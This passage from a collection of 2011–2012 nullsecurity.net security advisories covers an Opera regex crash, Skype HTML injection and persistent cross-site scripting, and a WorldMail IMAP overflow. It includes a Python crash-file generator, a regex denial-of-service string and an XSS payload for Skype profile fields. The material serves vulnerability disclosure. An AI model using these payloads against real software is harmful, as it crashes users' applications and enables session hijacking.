+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+/((^|>)[^<>]*(&amp;|[\/\?\;\_\&\%]))/g,"TEST")}}catch(c){}}sj_be(_w,"load",addSpacesToResults);
 74 | //]]></script>
 75 | <html>
 76 | <body>
 77 | 
 78 | --- SNIP ---
 79 | 
 80 | Python script for debugging:
 81 | 
 82 | --- SNIP ----
 83 | 
 84 | #!/usr/bin/python
 85 | 
 86 | filename = 'poc2.html'
 87 | 	
 88 | content = open('template2.html', 'r').read()
 89 | 
 90 | buff = '\.]+' * 5000
 91 | 
 92 | rc = 300
 93 | content2 = content[:rc] + buff + content[rc:]	
 94 | 
 95 | FILE = open(filename,"w")
 96 | FILE.write(content2)
 97 | FILE.close()
 98 | 
 99 | --- SNIP ---
100 | 
101 | template2.html:
102 | 
103 | --- SNIP ---
104 | 
105 | <html>
106 | <body>
107 | <script type="text/javascript">//<![CDATA[
108 | function addSpacesToResults(){try{for(var b=_d.getElementsByTagName("cite"),a=0;a<b.length;a++){el=b[a];firstNode=el.firstChild.nodeName;if(el.textContent.length>40&&(firstNode=="#text"||firstNode=="STRONG"))el.innerHTML=el.innerHTML.replace(/((^|>)[^<>]*(&amp;|[\/\?\;\_\&\%]))/g,"TEST")}}catch(c){}}sj_be(_w,"load",addSpacesToResults);
109 | //]]></script>
110 | <html>
111 | <body>
112 | 
113 | --- SNIP ---
114 | 
115 | 
116 | IMPACT
117 | ======
118 | 
119 | You can only provoke a crash of the Opera process.
120 | 
121 | 
122 | THREAT LEVEL
123 | ============
124 | 
125 | Low
126 | 
127 | 
128 | STATUS
129 | ======
130 | 
131 | Not fixed.
132 | 
133 | 
134 | DISCLAIMER
135 | ==========
136 | 
137 | nullsecurity.net hereby emphasize, that the information which is published here are
138 | for education purposes only. nullsecurity.net does not take any responsibility for
139 | any abuse or misusage!
140 | 
141 |                 Copyright (c) 2011 - nullsecurity.net
142 | 


--------------------------------------------------------------------------------
/nullsec-opera.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nullsecuritynet/advisories/3658feb88b01061addd2736991d83edb12a5b23c/nullsec-opera.txt


--------------------------------------------------------------------------------
/nullsec-skype-02.txt:
--------------------------------------------------------------------------------
  1 | ===============================================================================
  2 | |                                                                             |
  3 |                          ____                     _ __
  4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
  5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
  6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
  7 |                                                      /___/ team
  8 | 
  9 |                           PUBLIC SECURITY ADVISORY
 10 | |                                                                             |
 11 | ===============================================================================
 12 | 
 13 | 
 14 | TITLE
 15 | =====
 16 | 
 17 | Skype - HTML/Javascript Code Injection
 18 | 
 19 | 
 20 | AUTHOR
 21 | ======
 22 | 
 23 | noptrix
 24 | 
 25 | 
 26 | DATE
 27 | ====
 28 | 
 29 | 08-17-2011
 30 | 
 31 | 
 32 | VENDOR
 33 | ======
 34 | 
 35 | Skype - http://www.skype.com/
 36 | 
 37 | 
 38 | AFFECTED PRODUCT
 39 | ================
 40 | 
 41 | Skype in version <= 5.5.0.113
 42 | 
 43 | 
 44 | AFFECTED PLATFORMS
 45 | ==================
 46 | 
 47 | Windows XP, Vista, 7
 48 | 
 49 | 
 50 | VULNERABILITY CLASS
 51 | ===================
 52 | 
 53 | HTML/Javascript code injection
 54 | 
 55 | 
 56 | DESCRIPTION
 57 | 
 58 | Skype suffers from a persistent code injection vulnerability due to a lack
 59 | of input validation and output sanitization of following profile entries:
 60 | 
 61 |     [+] home
 62 |     [+] office
 63 |     [+] mobile
 64 | 
 65 | 
 66 | PROOF OF CONCEPT
 67 | ================
 68 | 
 69 | The following HTML codes can be used to trigger the described vulnerability:
 70 | 
 71 | --- SNIP ---
 72 | 
 73 |     [+] Home Phone Number:
 74 |     <b>INJECTION HERE</b>
 75 | 
 76 |     [+] Office Phone Number:
 77 |     <center><i>INJECTION HERE</i></center>
 78 | 
 79 |     [+] Mobile Phone Number:
 80 |     <a href="#">INJECTION HERE</a>
 81 | 
 82 | --- SNIP ---
 83 | 
 84 | For a PoC demonstration see:
 85 | 
 86 |     [+] http://www.nullsecurity.net/tmp/skype_inject.png
 87 | 
 88 | 
 89 | IMPACT
 90 | ======
 91 | 
 92 | An attacker could for example inject HTML/Javascript code. It has not been
 93 | verified though, if it's possible to hijack cookies or to attack the underlying
 94 | operating system. Attacker could give a try using extern .js files...
 95 | 
 96 | 
 97 | THREAT LEVEL
 98 | ============
 99 | 
100 | Low - ?
101 | 
102 | 
103 | STATUS
104 | ======
105 | 
106 | Not Fixed.
107 | 
108 | 
109 | NOTES
110 | =====
111 | 
112 | Skype disputes my finding and claims:
113 | 
114 | "We have had this reported to us by various media outlets and have confirmed
115 | that the person is mistaken, this is not a web window and while it does cause a
116 | phone number to be underlined, does nothing other than this" Skype's spokewoman
117 | quote.
118 | 
119 | Here is my answer:
120 | First of all, they use HTML to embed all entries in Skype user's profile. The
121 | "parser" is not validating the input, so I was able to inject HTML code (any
122 | html tags are possible). My first Skype bug was depending on these entries.
123 | Their fix was: Sanitize the output on their webservers. What about the
124 | input in the client app? Does it make sense to allow users to "embed" HTML code
125 | in their Skype profile and especially in those "phone number" fields?
126 | Also, there is no option to define any HTML code in Skype client. I was able to
127 | find those bugs with Linux Skype client. I guess, they don't focus so much on
128 | that client. Watch my Skype video about first finding at
129 | http://www.youtube.com/watch?v=eIgb9D-0DWs and see how I used the Linux Skype
130 | client. I will stop here, but you can test it.
131 | 
132 | 
133 | DISCLAIMER
134 | ==========
135 | 
136 | nullsecurity.net hereby emphasize, that the information which is published here are
137 | for education purposes only. nullsecurity.net does not take any responsibility for
138 | any abuse or misusage!
139 | 
140 |                 Copyright (c) 2011 - nullsecurity.net
141 | 


--------------------------------------------------------------------------------
/nullsec-skype.txt:
--------------------------------------------------------------------------------
  1 | ===============================================================================
  2 | |                                                                             |
  3 |                          ____                     _ __
  4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
  5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
  6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
  7 |                                                      /___/ team
  8 | 
  9 |                           PUBLIC SECURITY ADVISORY
 10 | |                                                                             |
 11 | ===============================================================================
 12 | 
 13 | 
 14 | TITLE
 15 | =====
 16 | 
 17 | Skype - Persistent Cross Site Scripting Vulnerability
 18 | 
 19 | 
 20 | AUTHOR
 21 | ======
 22 | 
 23 | noptrix
 24 | 
 25 | 
 26 | DATE
 27 | ====
 28 | 
 29 | 07-13-2011
 30 | 
 31 | 
 32 | VENDOR
 33 | ======
 34 | 
 35 | Skype - http://www.skype.com/
 36 | 
 37 | 
 38 | AFFECTED PRODUCT
 39 | ================
 40 | 
 41 | Skype in version <= 5.3.0.120
 42 | 
 43 | 
 44 | AFFECTED PLATFORMS
 45 | ==================
 46 | 
 47 | Windows XP, Vista, 7
 48 | Mac OS X <= 10.6.8
 49 | 
 50 | 
 51 | VULNERABILITY CLASS
 52 | ===================
 53 | 
 54 | Cross-Site Scripting
 55 | 
 56 | 
 57 | DESCRIPTION
 58 | ===========
 59 | 
 60 | Skype suffers from a persistent Cross-Site Scripting vulnerability due to a lack
 61 | of input validation and output sanitization of the "mobile phone" profile entry.
 62 | Other input fields may also be affected.
 63 | 
 64 | 
 65 | PROOF OF CONCEPT
 66 | ================
 67 | 
 68 | The following Javascript payload can be used as "mobile phone" entry to trigger
 69 | the described vulnerability:
 70 | 
 71 | --- SNIP ---
 72 | 
 73 | "><iframe src='' onload=alert('mphone')>
 74 | 
 75 | --- SNIP ---
 76 | 
 77 | For a PoC demonstration see:
 78 | 
 79 |     [+] http://www.nullsecurity.net/tmp/skype_xss.png
 80 |     [+] http://www.youtube.com/watch?v=eIgb9D-0DWs
 81 | 
 82 | 
 83 | IMPACT
 84 | ======
 85 | 
 86 | An attacker could trivially hijack session IDs of remote users and leverage the
 87 | vulnerability to increase the attack vector to the underlying software and
 88 | operating system of the victim.
 89 | 
 90 | 
 91 | THREAT LEVEL
 92 | ============
 93 | 
 94 | High
 95 | 
 96 | 
 97 | STATUS
 98 | ======
 99 | 
100 | Fixed.
101 | 
102 | 
103 | NOTES
104 | =====
105 | 
106 | To the whole world: Funny thing: Anglophone and German media refer me as
107 | Armenian in their Skype XSS articles, yet all the Turkish news sites insists
108 | that I am Turkish. For the record, I am Armenian and my people have been
109 | persecuted by Turkey for hundreds of years. Thanks.
110 | 
111 | 
112 | DISCLAIMER
113 | ==========
114 | 
115 | nullsecurity.net hereby emphasize, that the information which is published here are
116 | for education purposes only. nullsecurity.net does not take any responsibility for
117 | any abuse or misusage!
118 | 
119 |                 Copyright (c) 2011 - nullsecurity.net
120 | 


--------------------------------------------------------------------------------
/nullsec-worldmail.txt:
--------------------------------------------------------------------------------
 1 | ===============================================================================
 2 | |                                                                             |
 3 |                          ____                     _ __
 4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
 5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
 6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
 7 |                                                      /___/ team
 8 | 
 9 |                           PUBLIC SECURITY ADVISORY
10 | |                                                                             |
11 | ===============================================================================
12 | 
13 | 
14 | TITLE
15 | =====
16 | 
17 | WorldMail 3.0 IMAPD SEH overflow (egg hunter payload)
18 | 
19 | 
20 | AUTHOR
21 | ======
22 | 
23 | TheXero
24 | 
25 | 
26 | DATE
27 | ====
28 | 
29 | 09-01-2012
30 | 
31 | 
32 | VENDOR
33 | ======
34 | 
35 | Qualcomm
36 | 
37 | 
38 | AFFECTED PRODUCT
39 | ================
40 | 
41 | WorldMail 3.0 IMAPD
42 | 
43 | 
44 | AFFECTED PLATFORMS
45 | ==================
46 | 
47 | Windows
48 | 
49 | 
50 | VULNERABILITY CLASS
51 | ===================
52 | 
53 | Unauthenticated remote Structured Exception Handler - Code execution
54 | 
55 | 
56 | DESCRIPTION
57 | ===========
58 | 
59 | By sending an overly long 'a001 LIST' request via an unauthenticated session to
60 | the listening WorldMail 3 IMAP daemon it is possible to crash the service by
61 | overwriting SEH. 
62 | 
63 | 
64 | PROOF OF CONCEPT
65 | ================
66 | 
67 | [+] http://www.nullsecurity.net/tools/exploit/wm-imapd.py
68 | 
69 | 
70 | IMPACT
71 | ======
72 | 
73 | Remote code execution.
74 | 
75 | 
76 | THREAT LEVEL
77 | ============
78 | 
79 | Critical
80 | 
81 | 
82 | STATUS
83 | ======
84 | 
85 | Not fixed.
86 | 
87 | 
88 | DISCLAIMER
89 | ==========
90 | 
91 | nullsecurity.net hereby emphasize, that the information which is published here are
92 | for education purposes only. nullsecurity.net does not take any responsibility for
93 | any abuse or misusage!
94 | 
95 |                 Copyright (c) 2011 - nullsecurity.net
96 | 


--------------------------------------------------------------------------------